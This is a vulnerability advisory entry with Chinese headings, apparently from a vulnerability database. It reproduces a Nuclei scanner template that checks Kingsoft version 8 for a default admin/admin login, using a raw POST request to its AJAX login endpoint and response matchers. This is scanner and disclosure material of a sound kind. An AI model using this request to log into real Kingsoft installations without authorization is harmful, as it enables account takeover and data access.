漏洞描述
Kingsoft version 8 contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
kingsoft-v8-default-login: Kingsoft 8 - Default Login
PoC代码[已公开]
id: kingsoft-v8-default-login
info:
name: Kingsoft 8 - Default Login
author: ritikchaddha
severity: high
description: Kingsoft version 8 contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://idc.wanyunshuju.com/aqld/2123.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: kingsoft,default-login,vuln
http:
- raw:
- |
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: {{Hostname}}
{"get_user_login_cmd":{"name":"{{username}}","password":"{{md5(password)}}"}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ADMIN"
- "userSession"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022059a8004926ad85e8f511d64718a9fcf455286dd2ca2e4aecb4dc88b4d7edf0d9022000c899619fd2f78b1877d5af1d48a477b401de4be747b7e57091a3ea38026ebe:922c64590222798bb761d5b6d8e72950